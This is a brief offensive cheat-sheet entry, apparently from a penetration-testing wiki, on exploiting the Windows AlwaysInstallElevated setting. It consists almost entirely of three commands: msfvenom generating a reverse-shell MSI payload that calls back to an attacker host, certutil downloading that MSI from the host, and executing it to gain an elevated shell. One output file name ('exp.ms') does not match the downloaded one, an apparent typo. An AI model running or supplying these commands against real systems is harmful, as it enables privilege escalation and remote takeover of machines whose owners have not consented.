AlwaysInstallElevated

  • If on, just need to make malicious msi and install

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f msi > exp.ms
certutil -urlcache -split -f http://$IP/exp.msi exp.msi
.\exp.msi

Last updated